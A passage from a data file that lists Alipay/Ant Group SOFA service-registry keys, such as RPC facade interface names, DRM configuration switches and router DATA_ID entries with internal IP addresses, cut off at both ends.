KService:1.0:MRMOAPROD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.fpStandardPartnerCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.common.service.facade.TaskAdminService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finzyprod.facade.dispose.api.ZyLiquidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ResourceDeployQueryService:1.0:${dscc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.biz.manager.service.smartprogram.MctTaskModeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.profit.FintradeProfitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.cfmng.biz.exchange.manager.impl.ProcessPlatformSwitchDrmResource.processPlatform,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instriskcenter.facade.api.InstRiskConcentrationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.163.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MRCHASSET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.orgconfig.OrgConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-wealthhottwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.serverless.test.facade.SofaRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.184.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.biz.manage.service.impl.graycore.ConfigBetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.outerServiceEventCheckLoadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdCampRecruitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryConfigNgFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.ContentSamplePictureService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.InvestTeamAlterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.emergency.EmergencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:accordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.facade.standard.api.todo.ArTodoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kaleidoscopecenter.common.service.facade.StyleGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.dingtalk.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:iOperatorFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@agdsroalipay#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Servers_TP_O_BBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.trip.SceneConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:io.sofastack.cafe.workflowx.client.facade.WorkflowxOperationFacade:1.0:WORKFLOWX_CLIENT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.abilitycore.common.service.facade.solution.SolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.heralib.service.facade.api.FoConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.CcMoveRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.76.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.60.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_roleFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.attribute.AttributeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sptworksff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.batch.facade.BatchTempOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.college.material.MaterialQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.sdk.bizengine.query.RmcQueryEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.facade.query.PluginDataQuerier:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.MultiYebEteIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdda.facade.curd.CommonDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.config.facade.RaiseSwitchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.146.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datacaptain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instFrameArContractDeployCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.MfaConfigServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.ugcnews.api.UgcToNewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.FundAuthOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ReservationRecordBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.CategoryServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.olive.facade.api.plan.PlanCrowdValidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alipayuserservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alive.api.ALiveAnchorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mwealthprod.common.service.facade.FamilyAcOperationServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@channelspop#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.fcbuservice.common.service.facade.GroupActionFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditSceneProdBenefitMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.funds.FundsChannelNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:punishcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.sync.ProductDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.DepositInstReturnQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.paymentCommonQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.labelmanage.api.LabelManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleMappingOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.QuestionDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trsautct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ModuleConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.category.CategoryLoalManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbretailprod.common.facade.mall.open.MallOrderInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.53.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfundprod.common.service.facade.transfer.BatchTransRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.MobileLBSFindUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.CampConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:apacquirecenter_opensdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.facade.service.LegalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.operation.ArOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_LUCKYFOREST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dmirror.facade.check.CheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.doc.ZDocService:1.0:zcorealipayhkiddoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.promotion.PromotionTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityDacuSpecialDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.eod.EODProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.life.api.LifeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","appfuse@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcache:name=com.alipay.zdal.ldc.tair.processmngTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:revmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.MachineApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudprovision:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.core.service.process.JobEndTask:1.0:sceneSyncJobEndTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.ServiceBeanQueryFacade:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CloudDocQueryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.apply.AssetApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_merchantTagAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.36.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.CensorSheeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.igdispute.common.service.facade.ChargeBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ws.WebServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dartkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.46.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iinnertrans.facade.api.v2.InnerAccountTransFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.TaskTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCRiskDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocore.common.manager.facade.CampCopyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_BX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_MDEVSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.zdalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:paygrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.RefundApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_G_MAIL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:artvcroom#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsTemplateVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.openeco.OpenEcoClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.permission.PermissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","mobileic@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.benefit.facade.BenefitQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.serivce.query.MerchantAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.RuleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.CollectApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradequote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emembercenter.facade.OperatorAuthCtuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.trade.impl.XTradeParamDrmImpl.precheckSerialInstIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insrisk.common.service.mng.DecisionRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:creditvisaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:lifemsgprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_ITEM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MRCHISHUB#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.ApportionReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.CommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.WithdrawQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instopen.service.facade.OpRoleService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:consumeweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.core.service.message.MessageDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchaincustomer@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.activeservice.ActiveServiceFloatLayerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.facade.KaMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.AuthorizationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.xauthmng.facade.MgwMngDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotvilla.common.service.facade.api.manager.FundEventManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaCatalogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.refersLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.splitNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.tddl.v1_app_processmng_replication.switch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.gray:name=com.alipay.grayprod.change.drm.ChangePolicy.targetConfigTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.infosec:name=com.alipay.infosec.client.drm.ClientDrmResourceManager.bizTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.167.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.service.facade.ModelDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-b2GCreditAuditCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.biz.delivery.rpc.VoucherRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcAccountFinishQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ActionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.starWishCountBySubjectIdGrayUidNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.core.service.repository.ItemDraftRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:chairsffdemo#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.baseinfo.EpRelationInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.deductFiledIsStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antlescenter.common.service.facade.api.SealService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csportal.service.facade.api.TaskBizInfoTransferFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniselfop.facade.api.miniplan.MiniPolicyEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcreportcenter.common.facade.service.seal.OfflineSealServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdopunit.facade.api.imdb.ImdbOperationService:1.0:imdb_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.AssetTransSalesQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-pcardsales-dispatch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accustomercore.common.service.facade.UCKernelAccessorManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:kborderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.service.facade.PasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.sql.service.OfflineExtendPropService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_done@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:dailyXflushCountLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.EbppChannelRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_INSTRISKCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.feecharge.common.service.facade.BillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:alcorporation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.syncdelayTimeDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.autoaccess.EbppChargeInstFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.co